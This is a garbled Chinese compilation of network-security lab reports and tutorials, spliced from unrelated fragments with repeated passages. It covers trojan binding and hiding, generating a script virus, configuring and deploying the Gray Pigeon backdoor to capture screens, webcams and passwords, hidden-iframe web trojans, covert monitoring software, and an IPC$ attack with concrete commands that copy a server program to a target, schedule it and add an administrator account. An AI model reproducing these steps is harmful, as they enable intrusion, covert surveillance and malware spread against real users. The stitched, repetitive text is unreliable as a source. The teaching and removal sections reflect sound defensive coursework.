下载文档原格式
木马捆绑与隐藏12.2.1 背景描述木马并不是合法的网络服务程序,如果单纯以本来面目出现,很容易被网络用户识别。
为了不被别人发现,木马制造者必须想方设法改换面貌;为了诱使网络用户下载并执行它,黑客将木马程序混合在合法的程序里面,潜入用户主机。
在受害主机里,为了逃避杀毒软件的查杀,木马也会将自己“乔装打扮”;为了防止用户将其从系统里揪出来,木马则采取一切可能的手法进行隐藏自己。
总之,现在的木马制造者是越来越狡猾,他们常用文件捆绑的方法,将木马捆绑到图像、纯文本等常见的文件中,然后通过网页、QQ、Email 或MSN 等将这些文件传送给受害者,而用户一旦不慎打开这些文件,木马就自动执行了,主机就中木马了。
12.2.2 工作原理1.木马捆绑木马捆绑即是文件捆绑,黑客将木马或者病毒等恶意程序与其它正常文件组合成的一个整体。
这是一种最简单也是最可行和最常用的一种方法,当受害者下载并运行捆绑了木马等恶意程序的文件时,其中的木马等恶意程序就会被激活。
木马捆绑的手段归纳起来共有四种:(1)利用捆绑机软件和文件合并软件捆绑木马;(2)利用WINRAR、WINZIP 等软件制作自解压捆绑木马;(3)利用软件打包软件制作捆绑木马;(4)利用多媒体影音文件传播。
2.木马隐藏隐藏是一切恶意程序生存之本。
以下是木马的几种隐藏手段:(1)进程隐蔽:伪隐藏,就是指程序的进程仍然存在,只不过是让它消失在进程列表里。
真隐藏则是让程序彻底的消失,不以一个进程或者服务的方式工作,做为一个线程,一个其他应用程序的线程,把自身注入其他应用程序的地址空间。
(2)伪装成图像文件:即将木马图标修改成图像文件图标。
(3)伪装成应用程序扩展组件:将木马程序写成任何类型的文件(如dll,ocx等),然后挂在十分出名的软件中。
因为人们一般不怀疑这些软件。
(4)错觉欺骗:利用人的错觉,例如故意混淆文件名中的1(数字)与l(L的小写)、0(数字)与o(字母)或O(字母)。
《网络攻击与防范》实验报告(2)单击“下一步”按钮·进人如图 4-2 所示的“禁止功能选项”设定界面.根据需要进行设定。
例如。
如果选中“禁止右键菜单”复选框.当运行了该病毒后.右击时将无法弹出快捷菜单。
图 4-2 设置“禁止功能选项”(3)单击“下一步”按钮.进入如图 4-3 所示的“病毒提示对话框”设定界面时。
根据需要设置有关开机时病毒的执行情况。
当选中“设置开机提示对话框”复选框.并设置了提示框标题和内容等后,相关信息将以对话框方式在开机时自动显示图4-3 设置开机时病毒的执行情况(4)单击“下一步”按钮,进入如图 4-4 所示的“病毒传播选项”设定界面,根据需要进行设定。
当选中“通过电子邮件进行自动传播(蠕虫)”复选框时.病毒可以向指定数量的用户发送垃圾邮件。
图4-3 设置开机时病毒的执行情况下一步夏上一步图4-4“病毒传播选项”设定界面(5)单击“下一步”按钮,进入“IE 修改选项”设定界面,根据需要进行设定。
注意.当选中“设置默认主页”复选框后,会弹出“设置主页”对话框,需要读者输人要修改的IE 浏览器主页地址(即每次打开IE 浏览器时默认打开的主页地址).如图 4-5 所示图4-5设置IE浏览器修改选项(6)单击“下一步”按钮,在出现的如图 4-6 所示的对话框中选择所生成的脚本病毒存放的位置,单击“开始制造”按钮,生成病毒文件。
图4-6选择所生成的脚本病毒存放的位置此时,可看到相应路径下,已经生成了脚本病毒文件3.2感染病毒并观察感染后的系统变化情况(1)将生成的脚本病毒文件置于虚拟机中,在其上双击使之运行。
为保证完整准确地查看病毒的感染效果.可重启已经感染了病毒的虚拟机系统。
然后,根据病毒文件生成时的设置,观察系统感染了病毒后的表现情况。
主要操作步骤如下。
(2)观察系统文件夹下的异常变化,可以发现,在 C:\ Windows,C:\Windows\system32下多了不明来源的脚本文件。
江苏经贸职业技术学院
实验报告
(2011/2012 学年第二学期)
系部信息技术系
课程名称网络安全技术
学生姓名
学号
班级10网络(数码)
指导教师
二00六年二月制
上启用远程桌面服务,C2用远程桌面连接客户端登录到S1,观察远控效果;上开启灰鸽子木马客户端,配置出一个专供自己使用的灰鸽子服务器端,
三、实验步骤:
4.在S1上启用远程桌面服务,C2用远程桌面连接客户端登录到S1,观察远控效果;XP远程登录到2003
2003远程登录到XP
在C2上开启灰鸽子木马客户端,配置出一个专供自己使用的灰鸽子服务器端,让S1运行木马服务器端,等待它自动上线后进行各种远程控制,观察效果;
四、实验中遇到的问题及解决方法:。
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
实验单元五.网页挂马技术一、实验目的和要求了解网站挂马的概念、原理;掌握javascript网页木马的工作过程,编码方法和解码方法;掌握分析与验证网页木马的方法,能够陈述给定网页木马的漏洞利用过程,设计挂马网页实现指定恶意代码的下载与运行二、实验内容和原理网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件,如果网站存在SQL注入漏洞,则比较容易取得一定的权限。
如果在服务器上对网站目录等做了较严格的权限限制,也是比较容易取得Webshell权限,具有Webshell权限可以对网页文件进行修改,而挂马就是在网页中加入一些代码。
这些代码往往是利用浏览器或者应用程序的漏洞,浏览者在访问这些网页时,往往会在不知不觉中去下载一些木马程序来执行。
网站挂马的原理就是设置框架网页的宽度和高度为0,将一些恶意网页隐藏起来,用户访问网站时不容易觉察。
网站挂马的常见方式1.框架挂马<iframe src=地址 width=0 height=0></iframe>其中“地址”处可以输入恶意网站链接等。
属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。
这个方法也是挂马最常用的一段代码,但是随着网站管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
2.js文件挂马只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS 代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。
相比iframe这个标签,<SCRIPT src="http://xx.js" type=text/javascript>这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script 标签。
灰鸽子使用教程灰鸽子是国内一款著名后门。
比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。
其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。
客户端简易便捷的操作使刚入门的初学者都能充当黑客。
当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。
但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
这就好比火药,用在不同的场合,给人类带来不同的影响。
对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚,在此我们只能进行简要介绍。
灰鸽子客户端和服务端都是采用Delphi编写。
黑客利用客户端程序配置出服务端程序。
可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。
连接密码的设定使得灰鸽子服务端程序只能被配置它的黑客控制,避免了黑客之间的竞争。
服务端对客户端连接方式有多种,使得处于各种网络环境的用户都可能中毒,包括局域网用户(通过代理上网)、公网用户和ADSL拨号用户等。
只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以上的端口来完成。
支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读取系统设定的代理服务器信息,无需用户设置!可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第三方软件支持!支持Windows9x/ME/2000/Xp/2003。
便于黑客进行跳板攻击。
除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。
其他后门具有的功能,你几乎都可以在灰鸽子里找到。
而且每个功能都做的非常细致,非常人性化。
整体界面比较清爽,容易上手,对每一个小细节的考虑都很到位,所有能想到的Ideal几乎都实现了。
计算机网络安全教程实验(共22页)--本页仅作为文档封面,使用时请直接删除即可----内页可以根据需求调整合适字体及大小--11、建立一个虚拟的操作系统,这里按照默认的4G就够了。
点击按钮“下一步”进入文件存放路径设置界面,如图所示。
12、整个虚拟机上操作系统就包含在这个文件中,点击按钮“完成”,可以在VMware的主界面看到刚才配置的虚拟机,如图所示。
13、点击绿色的启动按钮来开启虚拟机,如图所示。
14、可以看到VMware的启动界面,相当于是一台独立的计算机,如图所示。
15、在图1-18中可以看到,按下功能键“F2”进入系统设置界面,进入虚拟机的BIOS(Basic Input and Out System)设置界面,如图所示。
16、为了使所有的网络安全攻击实验都可以成功完成,在虚拟上安装没有打过任何布丁的Windows Advanced Server 2000。
安装完毕后,虚拟机上的操作系统如图所示。
17、这样两套操作系统就成功的建成了。
启动成功后,进入操作系统,配置虚拟机上操作系统的IP地址,使之和主机能够通过网络进行通信,配置虚拟机操作系统的IP地址是:,如图所示。
18、主机和虚拟机在同一网段,并可以通信。
利用Ping指令来测试网络是否连通。
在主机的DOS窗口中输入“Ping .”,如图所示。
实验二 Sniffer的使用实验目的:本实验主要学习利用Sniffer抓包软件的使用实验仪器设备:计算机实验环境:Windows 2000 Server、Sniffer实验内容:1、进入Sniffer主界面,抓包之前必须首先设置要抓取数据包的类型。
选择主菜单Capture下的Define Filter菜单,如图所示。
2、在抓包过滤器窗口中,选择Address选项卡,如图所示。
窗口中需要修改两个地方:在Address下拉列表中,选择抓包的类型是IP,在Station1下面输入主机的IP地址,主机的IP地址是;在与之对应的Station2下面输入虚拟机的IP地址,虚拟机的IP地址是。
灰鸽子远程控制完整详细教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
想要修改这两个密码,可点击“选项”-“修改密码”。
6.设置好密码密码后,点右上角的关闭按扭,软件就会在后台运行,桌面上看不到任何图标和提示。
想要再次操作软件,请按下ctrl+y键。
右上角的关闭按扭只是将软件界面关闭,想要彻底退出软件,应点击左上角的“文件”-“退出”。
很多用户想要卸载软件时,发现无卸载,就是因为没有退出程序造成。
7.有同样的方法在另一台电脑安装Netman监控版并使用另一个会员登录,在“远程IP/ID”处输入对方的会员ID和控制密码,点击“连接”即可连接远程电脑。
![[实用参考]远程控制实验](https://uimg.taocdn.com/efa66f92c77da26925c5b08b.webp)
实验三远程控制实验【实验目的】通过本实验初步了解远程控制软件的编写方法,了解黑客利用流行的木马软件进行远程监控和攻击的方法,掌握常见工具的基本应用,包括如下几个方面:✓掌握基于Socket的网络编程。
✓了解远程控制软件的基本实现方法。
✓了解各种流行木马的基本特性。
实验过程中,学生需要将实验的结果记录下来,并回答相关思考题,填写到实验报告中。
【实验类型】综合型实验【实验内容】以下实验内容可根据实验室的具体情况和课时安排的变化进行适当的调整,实验内容中的思考题以书面形式解答并附在实验报告的后面。
需要注意的是,学生在实验过程中要严格按实验指导书的操作步骤和要求操作,且小组成员应紧密配合,以保证实验过程能够顺利完成。
本次实验的主要项目包括以下几个方面:☑远程控制软件的编写、调试;☑灰鸽子/网络神偷木马的运用;☑一句话ASP木马的运用。
具体的实验内容和步骤如下:【实验环境】实验设备:WindowsGP系统,VMWare系统,Windows20GG/GP虚拟机。
一、远程控制软件的编写、调试编写一个简单的远程控制程序,编译后分别在实验主机和虚拟机中运行。
示例代码参见实验附加文件。
【思考题】远程控制软件的编写与普通的Socket应用程序有何不同?二、灰鸽子/网络神偷木马1.灰鸽子木马运行灰鸽子木马之前,通常需要准备一个用来发布控制端地址匿名Web空间,这里我们在实验机上配置IIS创建所需的网站,配置方法参见其它资料。
运行灰鸽子木马控制端程序,首先需要设定“自动上线”的匿名Web站点,如图。
输入发布Web站点地址等信息,点击“更新IP和FTP空间”。
下一步,生成用于被控制系统的服务端,点击“配置服务器”。
设定自动上线Web主机的http链接,并设置木马的安装选项、启动设置等。
设定要保存的服务端木马的文件名、暂存位置等。
配置成功后,将生成的木马文件上传到目标主机中,然后在目标主机中运行。
根据前面的设定,安装完毕后木马会自动将安装文件删除。
一禁用系统恢复使用组策略编辑器1. 单击开始,单击运行,键入gpedit.msc,然后单击确定。
2. 展开“计算机配置”,展开“管理模板”,展开“系统”,然后单击系统恢复。
3. 双击“关闭系统恢复”,然后在设置选项卡上,选择禁用。
4. 双击“关闭配置”,然后在设置选项卡上,选择启用。
有关这些设置的作用的详细信息,请在单击属性对话框上的解释选项卡。
5. 单击应用,然后单击确定。
二升级病毒定义库Symantec 可LIVEUPDA TE,NORTON也能吧三在安全模式扫描,并删除感染文件操作后可离开安全模式,跳到四四删除注册表键值Symantec强烈建译备份注册表.click 开始>运行-- 输入regedit,确定后进入HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Connection Wizard删除右侧值: "Compleated" = "1"再进入,删除下列键(key)HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\GrayPigeonServerHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_GRAYPIGEONSERVER离开注册表编辑器五查找并停止服务click 开始>运行-- 输入services.msc,确定后进入定位并选择探测到的Trojan.Feutel服务点吉动作(Action)>属性(Properties),点吉停止改变启动类型为手动点吉确定,关闭服务窗口重启XfeliX关于Trojan.Feutel(灰鸽子)病毒无法清除的解决办法前段时间浏览网页的时候,杀毒软件报告发现病毒Trojan.Feutel,病毒位于c:\windiwos,文件名称为G_Server.exe、G_Server.dll和G_Server_Hook.dll,而且杀毒软件无法清除,感觉应该是中了恶意代码(木马)。
灰鸽子破解版教程(考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看)第一部份:网络人远程监控软件网络人远程控制个人版分为Netman办公版与Netman监控版。
两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。
Netman监控版详细安装方法:1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。
2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program Files\Netman”,可以自己修改,但安装路径需要记住,因为启动软件桌面上不会新建快捷方式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。
3.完成以上操作后,再按ctrl+y即可呼出软件主界面。
监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。
5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。
很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。
出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。
网络安全技术及应用实训报告项目一:网络渗透攻击实训项目学号:09011506姓名:刘旭信息分院计算机网络技术目录第一章任务1 社会工程学 (1)1.1“社会工程学”概述 (1)1.2“社会工程学”的3个欺骗步骤 (1)1.3实现步骤 (1)第二章任务2 木马免杀 (3)2.1 木马免杀概述 (3)2.2 木马免杀原理 (3)2.3 内容目的 (4)2.4 具体实验步骤 (4)第三章任务3 木马捆绑 (6)3.1 木马捆绑概述 (6)3.2 木马捆绑原理 (6)3.3 实验步骤 (6)第四章任务4 木马植入 (8)4.1木马植入的方式 (8)4.2 木马的运行方式 (8)4.3 实验步骤 (8)第五章任务5 缓冲区益处 (11)5.1 缓冲区益处概述 (11)5.2 缓冲区益处危害 (11)5.3 实验步骤 (12)第六章任务6 远程控制 (14)6.1 远程控制基本原理 (14)6.2 实验步骤 (14)第七章任务7 主机发现 (15)7.1 主机发现概述 (15)7.2 主机发现原来 (15)7.4 主机发现 (15)7.5 实验步骤 (16)第八章任务8 端口扫描 (17)8.1端口扫描概述 (17)8.2 端口扫描原理 (17)8.3 实验步骤 (18)第九章任务9 漏洞扫描 (19)9.1 漏洞扫描概述 (19)9.2 漏洞扫描原理 (19)9.3 漏洞扫描工具 (19)9.4 实验步骤 (20)第十章任务10 ARP欺骗 (21)10.1 ARP 欺骗定义 (21)10.2 ARP 欺骗原理 (21)10.3 APR命令解释 (22)10.4 实验步骤 (22)第一章任务1 社会工程学1.1“社会工程学”概述“社会工程学(Social Engineering)”是一种通过对受害者的心理弱点、本能反应、好奇心、信任和贪婪等心理陷阱,来骗取用户的信任以获取机密信息和系统设置等不公开资料,为黑客攻击和病毒感染创造了有利条件。
实验2 多种方法防范计算机病毒2.1 实验目的●了解Windows系统漏洞的概念。
●掌握使用微软MBSA工具和360安全卫士扫描系统漏洞并下载、安装补丁的方法。
●理解端口的概念。
●掌握查看端口开放状态的方法和启用与关闭端口的方法。
●了解常用的杀毒软件的种类。
●掌握使用杀毒软件和专杀工具查杀计算机病毒的方法。
●了解防火墙的概念。
●掌握使用Windows防火墙和专业的第三方防火墙程序抵御黑客攻击的方法。
●了解通过制定不同的组策略来动态的维护系统安全的方法。
2.2 实验环境接通Internet的PC机;安装Windows XP操作系统,并且安装有TCP/IP协议;独立操作。
2.3 准备知识一、Windows系统漏洞是指Windows操作系统本身所存在的技术缺陷。
系统漏洞往往会被病毒用来侵入并攻击用户计算机。
Windows操作系统供应商将定期对已知的系统漏洞发布补丁程序,用户只要定期下载并安装补丁程序,即可保证计算机不会轻易被病毒入侵。
MBSA是微软公司发布的一款系统漏洞检测工具,除了检测漏洞外,还提供了详细解决方案以及补丁下载地址,是Windows系统用户首选漏洞检测工具。
360安全卫士是一款可以自动扫描漏洞和自动下载补丁的免费软件,用户可以到/下载。
二、端口就好比计算机的大门,计算机中对外收发的数据都需要经过端口。
黑客常用的木马程序要盗取个人电脑中的数据,也必须使用端口。
通过使用不同的端口,可以让不同功能产生的数据互不干扰。
比如:FTP服务默认使用的端口是21端口,而HTTP服务默认使用的端口是80端口。
用户可以使用Windows自带的Netstat命令来查看本机开放的所有端口、查看本机开放的可疑端口程序、检查出恶意程序调用的端口等。
用户可以使用Windows防火墙功能,将负责局域网中资源共享的4个端口禁用,也可以根据不同的端口所对应的系统服务不同,将不同的端口关闭。
比如:有些蠕虫病毒可利用UDP123端口传播,而这个端口对应的服务是Windows time,用户可以通过禁用该服务来禁用123服务端口。
网络安全技术实验net share zzz=d:\zzz 共享d:\zzz 共享名为zzznet use \\ip\zzz 123 /user:zero用户zero密码123连接共享copy \\ip\zzz\xxx.xxx C:\xxx.xxx从共享复制xxx.xxx到C:\xxx.xxx[添加管理员用户]net user zero 123 /add 添加zero用户密码为123net localgroup administrators zero /add添加zero到administrators用户组ftpopen ?.?.?.?用户名密码put x:\xxx.xxx 上传get xxx.xxx x:\xxx.xxx 下载bye 退出--------------------------------------------------------------------------[IPC$攻击]net use \\ip\ipc$ "" /user:""copy C:\Server.exe \\ip\ipc$[计划任务]net time \\ip 查看ip当前时间at \\ip time Server.exetelnet ip添加管理员用户如上题一.熟悉常见的系统命令在命令行下完成以下命令的功能使用:Net share(创建共享文件夹)C:\>md 56C:\>net share 56=c:\5656 共享成功。
Net use(访问并复制共享文件夹中的内容到本地计算机)net use \\ip\zzz 123 /user:zero用户zero密码123连接共享copy \\ip\zzz\xxx.xxx C:\xxx.xxx从共享复制xxx.xxx到C:\xxx.xxxNet user(创建用户账号、并将用户添加到管理员组)ftp(完成FTP的上传、下载)(一)IPC$攻击利用IPC$漏洞对未打补丁的Windows计算机实施攻击主要步骤:1.扫描IPC$计算机2.将Server.exe程序上传到目标机器E:\实验工具\IPC$攻击工具>net use \\192.168.1.11\ipc$E:\实验工具\IPC$攻击工具>copy E:\实验工具\IPC$攻击工具\SRV.EXE \\192.168.1.11\e$\SRV.EXE 3.为目标计算机指定计划任务E:\实验工具\IPC$攻击工具>at \\192.168.1.11 19:33 srv.exe4.用Telnet命令连接sc \\192.168.1.11 start tlntsvrtelnet 192.168.1.115.添加管理员账号E:\>net user lijietian sotian /addE:\>net localgroup administrators lijietian /add(二)SQL注入漏洞提权1.将嘉枫文章管理系统发布到IIS上2.用domain4.1进行旁注检测3.猜解表名4.猜解列名5.破解用户名、密码6.管理入口扫描7.用得到的管理员账号登录(三)电子邮件安全(PGP)用PGP实现电子邮件的加密/签名和解密/校验1.配置Outlook Express可正确收发邮件2.产生密钥对3.导入对方公钥4.签名并信任对方公钥5.成功发送加密邮件,成功解密密文6.成功发送签名邮件,正确验证签名7.成功发送加密并签名邮件,正确解密校验邮件(四) 电子邮件安全(S-MIME )用Outlook Express 自带的安全功能实现电子邮件的加密/签名和解密/校验1. 配置Outlook Express 可正确收发邮2.下载安装CA证书’3.申请并下载安装电子邮件安全证书4.获得对方的数字标识5.成功发送加密邮件,成功解密密文6.成功发送签名邮件,正确验证签名7.成功发送加密并签名邮件,正确解密校验邮件(五)防火墙ISA Server 2004通过配置防火墙策略实现如下内容1.在ISA主机上安装IIS,并配置Web服务,网站首页为自己的姓名和学号;2.配置防火墙策略允许另一台计算机可以访问Web页面;3.在另一台非ISA主机上安装配置POP3服务,并配置邮件服务;4.配置防火墙策略允许ISA主机访问邮件服务。
实验三木马及远程控制技术练习一网页木马一、实验目的该实验为设计性实验。
✧剖析网页木马的工作原理✧理解木马的植入过程✧学会编写简单的网页木马脚本✧通过分析监控信息实现手动删除木马二、实验内容1.木马生成与植入2.利用木马实现远程控制3.木马的删除注:详细实验操作请参考实验室服务器上的参考资料。
三、实验步骤本练习主机A、B为一组,C、D为一组,E、F为一组。
实验角色说明如下:下面以主机A、B为例,说明实验步骤。
首先使用“快照X”恢复Windows系统环境。
(一)木马生成与植入在进行本实验步骤之前,我们再来阐述一下用户主机通过访问被“挂马”的网站而被植入木马的过程,便于同学们理解和完成实验。
(1)用户访问被“挂马”的网站主页。
(此网站是安全的)(2)“挂马”网站主页中的<iframe>代码链接一个网址(即一个网页木马),使用户主机自动访问网页木马。
(通过把<iframe>设置成不可见的,使用户无法察觉到这个过程)(3)网页木马在得到用户连接后,自动发送安装程序给用户。
(4)如果用户主机存在MS06014漏洞,则自动下载木马安装程序并在后台运行。
(5)木马安装成功后,木马服务端定时监测控制端是否存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。
(6)客户端收到连接请求,建立连接。
1.生成网页木马(1)主机A首先通过Internet信息服务(IIS)管理器启动“木马网站”。
(2)主机A进入实验平台在工具栏中单击“灰鸽子”按钮运行灰鸽子远程监控木马程序。
(3)主机A生成木马的“服务器程序”。
主机A单击木马操作界面工具栏“配置服务程序”按钮,弹出“服务器配置”对话框,单击“自动上线设置”属性页,在“IP通知http访问地址、DNS解析域名或固定IP”文本框中输入本机IP地址,在“保存路径”文本框中输入“D:\Work\IIS\Server_Setup.exe”,单击“生成服务器”按钮,生成木马“服务器程序”。
电子信息工程学系实验报告——适用于计算机课程
课程名称:信息安全概论Array实验项目名称:灰鸽子的使用实验时间:2012.4.27
班级:信息安全101 姓名:徐凤姬学号:020708119
一、实验目的:
1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。
2、通过实验了解灰鸽子是一款优秀的远程控制软件。
3、熟悉使用木马进行网络攻击的原理和方法。
二、实验环境:
装有Windows 2000/XP系统的计算机,局域网或Internet,灰鸽子软件(服务器和客户端)。
三、实验原理
功能介绍:
(1)对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。
(2)远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!(3)捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能!
(4)视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话!
(5)telnet(超级终端).
(6)注册表模拟器:远程注册表操作就像操作本地注册表一样方便。
(7)命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页,
筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作。
(8)服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器。
(9)专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线。
(10)多种自动上线方式:专用上线、DNS解析域名、固定IP等,由用户自由选择。
四、实验内容
熟悉灰鸽子的使用,例如:窃取账号、密码、照片、重要文件,连续捕获远程电脑屏幕,监控被控电脑上的摄像头,或者进行远程控制。
五、实验步骤
1、在做灰鸽子实验前,先关闭杀毒软件和防火墙。
2、安装灰鸽子
(1)将下载的文件解压到某个文件夹,但不要改文件夹的名字。
(2)首先运行 sunray.exe,然后运行 http.exe 点开始服务。
(3)运行客户端,也就是H_Client.exe这个文件,点击“自动上线”选项。
3、远程控制灰鸽子的应用
(1)打开灰鸽子,主页面如下:
(2)在这里,我们主要配置下服务程序,图见下,在IP一栏里输入主人的IP
(3)配置成功后,然后点击生成服务器
(4)相应目录就会多出一个端。
把它传到要被控制的电脑里。
(5)传入成功后,我们可以浏览受控端计算机中的页面。
由图可知受控计算机的ip为172.22.27.92。
